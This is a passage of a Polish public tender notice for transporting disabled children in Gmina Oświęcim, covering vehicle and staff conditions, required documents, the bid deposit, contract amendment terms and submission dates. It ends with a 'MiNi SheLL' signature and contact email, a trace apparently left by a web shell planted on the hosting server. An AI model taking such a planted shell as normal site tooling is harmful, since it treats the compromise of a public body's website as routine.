pojazdy ( 2 pojazdy plus 1 w razie awarii). Każdy z pojazdów przystosowanych do<br/>przewozu osób niepełnosprawnych musi posiadać adnotacje w dowodzie rejestracyjnym, że pojazd jest przystosowany do<br/>przewozu osób niepełnosprawnych. Z 3 pojazdów (2 pojazdy oraz 1 pojazd zastępczy w razie awarii) minimum 2<br/>samochody przeznaczone do przewozu osób niepełnosprawnych muszą być wyposażone w atestowane urządzenie<br/>specjalistyczne (w windę z napędem elektrycznym lub podnośnik lub teleskopowy najazd lub rozkładaną platformę itp.<br/>urządzenia umożliwiające zajęcie miejsca osobom poruszającym się na wózkach inwalidzkich), jak również osprzęt<br/>atestowany zapewniający możliwość unieruchomienia przewożonych wózków. Urządzenia muszą posiadać atest –<br/>załącznik nr 5 do SWZ. Pojazdy muszą posiadać aktualne przeglądy techniczne oraz aktualne ubezpieczenie OC od<br/>odpowiedzialności cywilnej przez cały czas obowiązywania niniejszej umowy, spełniającymi wymogi bezpieczeństwa i<br/>kodeksu drogowego. 3) Zamawiający w zakresie zdolności zawodowej (potencjał osobowy) stawia wymagania w zakresie<br/>tego<br/>warunku, tzn. Wykonawca zapewnia, że:- dysponuje odpowiednią liczbą kierowców min. 3 do prowadzenia pojazdów,<br/>posiadających stosowne wymagane prawem ruchu drogowego uprawnienia, z których każdy posiada przeszkolenie z<br/>zakresu BHP, jest osobą niekaraną, korzystającą w pełni z praw publicznych i przeszkoloną z udzielania pierwszej pomocy<br/>przedmedycznej. - dysponuje odpowiednią liczbą opiekunów min. 3, z których każdy posiada przeszkolenie z zakresu BHP,<br/>jest osobą niekaraną, korzystającą w pełni z praw publicznych i przeszkoloną z udzielania pierwszej pomocy<br/>przedmedycznej. Wykonawca zapewnia, że opiekunowie przewożonych dzieci nie widnieją w rejestrze sprawców na tle<br/>seksualnym. Do weryfikacji w/w warunku wymagane będą następujące załączniki: nr 6 do SWZ, nr 6a do SWZ, nr 6b do<br/>SWZ, nr 6c do SWZ. 3. Zdolność do występowania w obrocie gospodarczym - Zamawiający nie precyzuje w tym zakresie<br/>żadnych wymagań. 4. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z<br/>odrębnych przepisów. O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki,<br/>dotyczące posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z<br/>odrębnych przepisów. Wykonawca w tym zakresie musi posiadać uprawnienia – licencję na wykonywanie krajowego<br/>transportu drogowego osób zgodnie z Ustawą z dnia 6 września 2001 r. o transporcie drogowym (t.j.: Dz. U. z 2022 r. poz.<br/>180 ze zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku<br/>podstaw wykluczenia Wykonawcy z udziału w postępowaniu: 1.Oświadczenie wykonawcy w sprawie grupy kapitałowej -<br/>ZAŁĄCZNIK Nr 5 SWZ Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej<br/>grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2020 r. poz. 1076 i<br/>1086), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu,<br/>albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy<br/>należącego do tej samej grupy kapitałowej. 2. Odpis lub informacja z KRS lub CEIDG - Odpis lub informacja z Krajowego Rejestru<br/>Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp,<br/>sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych: W<br/>celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu: 1. Wykaz narzędzi wyposażenia zakładu i<br/>urządzeń technicznych dostępnych Wykonawcy w celu realizacji zamówienia<br/>wraz z informacją o dysponowaniu tymi zasobami. Wykonawca powinien wskazać, na jakiej podstawie dysponuje lub będzie<br/>dysponował wskazanymi urządzeniami (np. potencjał własny, potencjał podmiotu trzeciego zgodnie z art. 26 ust. 2b ustawy pzp itp.)<br/>Jeżeli Wykonawca polegał będzie na zasobach innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi<br/>stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji<br/>zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji<br/>niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Załącznik Nr 5 do SWZ 2. Wykaz osób<br/>skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług,<br/>wraz z informacjami na temat: ich kwalifikacji zawodowych, uprawnień, niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Załącznik Nr 6, Nr 6a, Nr<br/>6b, Nr 6c do SWZ 3. Koncesja,<br/>zezwolenie lub licencja Koncesja, zezwolenie, licencja lub dokument potwierdzający, że Wykonawca jest wpisany do jednego z<br/>rejestrów zawodowych lub handlowych, prowadzonych w państwie członkowskim Unii Europejskiej, w którym Wykonawca ma<br/>siedzibę lub miejsce zamieszkania, w celu potwierdzenia spełnienia warunku udziału w postępowaniu art.22 ust.1 ustawy Pzp.<br/>Potwierdzenie posiadania uprawnień do wykonywania przedmiotu zamówienia tj. uprawnienia – licencję – na wykonywanie<br/>krajowego transportu drogowego osób zgodnie z Ustawą z dnia 6 września 2001 r. o<br/>transporcie drogowym (t.j.: Dz. U. z 2022 r. poz. 180 ze zm.). 4. Dokumentów potwierdzających, że wykonawca jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy<br/>gwarancyjnej tego ubezpieczenia</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda złożenia wraz z ofertą przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> I. Wykaz innych wymaganych oświadczeń lub dokumentów:<br/>1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie dotyczące przesłanek<br/>wykluczenia z postępowania oraz spełnianiu warunków udziału w postępowaniu (art. 125 ust. 1 Pzp) – zgodnie z<br/>załącznikiem nr 2 do SWZ. 2. Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie,<br/>że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. 3. Wykonawca, który polega na<br/>zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą, zobowiązanie do oddania do<br/>dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Wzór oświadczenia stanowi<br/>załącznik nr 3 do SWZ. Wykonawca, w celu potwierdzenia spełnienia warunków udziału w postępowaniu, może polegać na<br/>zdolnościach technicznych lub zawodowych podmiotów trzecich, na zasadach określonych w art. 118–123 ustawy Pzp. 1)<br/>Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, zobowiązany jest: złożyć wraz z ofertą,<br/>zobowiązanie<br/>podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego<br/>zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów. Zobowiązanie podmiotu udostępniającego zasoby lub inny podmiotowy<br/>środek dowodowy, musi potwierdzać, że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje<br/>rzeczywisty dostęp do tych zasobów oraz określać w szczególności: a) zakres dostępnych Wykonawcy zasobów podmiotu<br/>udostępniającego zasoby; b) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia; c) czy i w jakim zakresie podmiot udostępniający zasoby, na<br/>zdolnościach, którego, którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą. 2) złożyć wraz z ofertą ”Oświadczenie o<br/>niepodleganiu wykluczeniu oraz spełnianiu warunków”, podmiotu<br/>udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz<br/>odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/>3) przedstawić na żądanie Zamawiającego podmiotowe środki dowodowe, określone w pkt 10.1 ppkt .2 SWZ, dotyczące<br/>tych podmiotów, na potwierdzenie, że nie zachodzą wobec nich podstawy wykluczenia z postępowania. 4. Zamawiający<br/>oceni, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub zawodowe pozwalają<br/>na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, a także zbada, czy nie zachodzą wobec<br/>Ogłoszenie nr 2022/BZP 00188106/01 z dnia 2022-06-01<br/>2022-06-01 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>tych podmiotów podstawy wykluczenia, które zostały przewidziane względem Wykonawcy w pkt 9 niniejszej SWZ. 5. Jeżeli<br/>zdolności techniczne lub zawodowe, podmiotu udostępniającego zasoby nie potwierdzą spełniania przez Wykonawcę<br/>warunków udziału w postępowaniu lub zajdą wobec tego podmiotu podstawy wykluczenia, Zamawiający zażąda, aby<br/>Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo<br/>wykazał, że samodzielnie spełnia warunki udziału w postępowaniu <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1	Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 1594,00 PLN (słownie: jeden tysiąc pięćset dziewięćdziesiąt cztery złote 00/100. 2	Wadium musi zostać wniesione przed upływem terminu składania ofert, tj. do dnia 2022-09-28 do godz. 12:00, według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2020 r. poz. 299).<br/>3 Wadium musi obejmować pełen okres związania ofertą tj. do dnia 2022-10-27 .Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: Bank Spółdzielczy w Andrychowie, O/Oświęcim nr 51 8110 1023 2003 0310 7842 0005;<br/>1)	(w tytule przelewu zaleca się wpisać nazwę i sygnaturę postępowania). Wadium musi wpłynąć na wskazany rachunek bankowy najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy Zamawiającego);<br/>4	Wadium wnoszone w formie poręczeń lub gwarancji należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę poręczenia lub gwarancji oraz powinno zawierać:<br/>1)	wskazanie Beneficjenta poręczenia lub gwarancji, którym musi być SAMORZĄDOWE CENTRUM USŁUG WSPÓLNYCH GMINY OŚWIĘCIM, Rajsko, ul. Edukacyjna 9,<br/> 32-600 Oświęcim;<br/>2)	nazwę i adres siedziby Wykonawcy;<br/>3)	kwotę i termin ważności gwarancji/poręczenia;<br/>4)	bezwarunkowe zobowiązanie wystawcy poręczenia lub gwarancji do zapłaty kwoty<br/>wadium, na pierwsze pisemne żądanie Zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>5	Zamawiający zwróci wadium na zasadach określonych w art. 98 ust. 1-5 ustawy Pzp.<br/>6	W przypadku, gdy Wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek |o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, Zamawiający odrzuci ofertę Wykonawcy na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>7	Zamawiający zatrzyma wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia, wystąpi odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, w przypadkach określonych w art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, wypełniony<br/>dokument ”Oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału”, o którym mowa w pkt 10.1 ppkt 2<br/>SWZ, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie<br/>warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Na podst. treści Działu VII „Rozdziału III ustawy PZP dopuszcza się zmiany postanowień zawartej umowy w stosunku do<br/>treści oferty, na podstawie której dokonano wyboru Wykonawcy. 2 Zamawiający dopuszcza dokonyw. zmian umowy na<br/>podstawie art. 455 ust. 1 pkt. 1) ustawy PZP w szczególności w następujących przypad. i zakresie:2.1zwiększenie bądź<br/>zmniejszenie liczby tras przewidzianych w Umowie (w tym zmiany miejsc rozpoczęcia i zakończenia danej trasy), a także<br/>konieczności zapewnienia dowozu dzieci do/z innych miejsc/jednostek niż wskazane w umowie;2.2 zmniejsz. liczby dni, w<br/>których będzie świadczona usługa przewozu w stosunku do orientacyjnej liczby podanej w SWZ,2.3 zmiana liczby<br/>przewożonych dzieci, którym Zamawiający obowiązany jest zapewnić usługi w okresie realizacji Umowy, zmiana przebiegutras przejazd., miejsc przystanków, godzin przywozu i odwozu, w zakresie:1) niezbędnym do zapewnienia transportu na<br/>warunkach przewidzianych w Umowie dla zmienionej liczby przewożonych dzieci, 2) niezbędnym do zapewnienia transportu<br/>dzieci do/z innych miejsc/jednostek/placówek niż wskazane w Umowie lub według zmienionego planu zajęć ww. jednostek,<br/>3) uwzględn. wystąpienie w trakcie realizacji Umowy nieprzewid. utrudnień w ruchu drogowym, takich jak: remont,<br/>przebudowa drogi, wyłączenia z ruchu, zmiany organizacji ruchu drog. i tym podobne.2.4 zmniejszenie zakresu rzecz.<br/>przedmiotu Umowy w szczególn. w razie rezygnacji przez Zamawiającego ze świadczenia usług na określonej trasie lub w<br/>określone dni w związku ze zmniejszeniem zapotrzebowania na usługi; 2.5 zmiana zakresu lub sposobu świadcz. usług, w<br/>przypad. zmiany przepisów prawa powszechnie obowiązującego mających zastosowanie do przedmiotu Umowy, w zakresie<br/>niezbędnym do dostos. Umowy do warunków wynikaj. ze zmienionych przepisów prawa;2.6 zlecenie dodatkowych zadań<br/>związanych z usługami, służąc. do usprawnienia procesu dowozu, polepszenia jakości usług bądź zapewnienia ich<br/>ciągłości. 3. Jeżeli zmiany, o których mowa w ust. 2 mają wpływ na wysokość wynagrodzenia, dopuszczalna jest zmiana<br/>wynagrodzenia w zakresie, w jakim zmiany te mają wpływ na wysokość wynagrodzenia Wykonawcy, z zastrzeżeniem, że<br/>zmiana wynagrodzenia nie przekroczy 10% pierwotnej wartości zamówienia.4. Zamawiający może dokonać zmiany umowy,<br/>poprzez czasowe zawieszenie wykonyw. umowy lub jej części - zmianę sposobu wykonyw. usług objętych umową - zmianę,<br/>w tym zmniejsz. zakresu świadcz. Wykonawcy i odpowiadającą jej - zmianę,w tym zmniejsz. Wynagr. Wykonawcy lub<br/>zmianę sposobu rozliczenia wynagrodz. Wykonawcy:4.1.w okresie zawieszenia lub ograniczenia działalności placówek<br/>oświat, uniemożliwiających lub ograniczających realizowanie w pełnym zakresie usług przewozu dzieci niepełnospr. w<br/>związku z obowiązywaniem stanu zagrożenia epidem. albo stanu epidemii; 4.2. z powodu wystąpienia siły wyższej,;<br/>wystąpieniu której ani Wykonawca ani Zamawiający, działając racjonalnie, nie mogli zapobiec przed zawarciem umowy;<br/>której, w przypadku jej wystąpienia, Wykonawca ani Zamawiający, działając racjonalnie, nie mogli uniknąć lub jej<br/>przezwyciężyć oraz która nie może być zasadniczo przypisana Wykonawcy ani Zamawiającemu, a także zdarzenie<br/>nadzwycz. losowo wywołane przez czynniki zewnęt., którego nie można było przewidzieć z pewnością, w szczególności<br/>zagrażającego bezpośr. życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach;4.3. z powodu<br/>działań osób trzecich uniemożliwiających wykonanie usługi, które to działania nie są konsekwencją winy którejkolwiek ze<br/>stron. 5. Zamawiający dopuszcza możliw. zmian umowy w zakresie: zmiany wynagrodz. w przypadku ustawowej zmiany<br/>podatku od towarów i usług VAT w okresie obowiązania umowy.6. Zamawiający dopuszcza możliw. zmian umowy w<br/>zakresie: zmiany z powodu działań osób trzecich uniemożliwiających wykonanie usługi;7. Wszelkie zmiany i uzupełnienia<br/>postanowień niniejszej umowy wymagają dla swej ważności, formy – patrz 28 SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-28 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę, wraz z załącznikami, należy złożyć za pośrednictwem miniPortalu i ePUAP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-28 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com